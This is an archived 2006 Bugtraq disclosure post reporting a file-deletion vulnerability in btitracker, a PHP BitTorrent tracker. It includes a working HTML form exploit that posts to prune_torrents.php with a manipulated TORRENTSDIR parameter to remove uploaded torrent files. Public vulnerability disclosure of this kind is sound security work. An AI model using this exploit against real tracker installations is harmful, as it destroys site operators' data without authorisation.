lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061006182024.14728.qmail@securityfocus.com> Date: 6 Oct 2006 18:20:24 -0000 From: aeroxteam@...il.com To: bugtraq@...urityfocus.com Subject: Vulnerability in Btitracker Hello, I found a vulnerability in btitracker (a tool for create a bittorrent tracker written in php…). This vulnerability can remove physically uploaded files .torrent video : http://aeroxteam.free.fr/btitracker.html exploit(not to diffuse) : <form action="http://127.0.0.1/btitracker/include/prune_torrents.php?action=prune&TORRENTSDIR=../torrents" method="POST"> <input type="hidden" name="hash" value="1"> <br />Hash :<br /> <input type="text" name="hash[0]"><br /> <input type="submit"> </form> Gu1ll4um3r0m41n, Aerox Team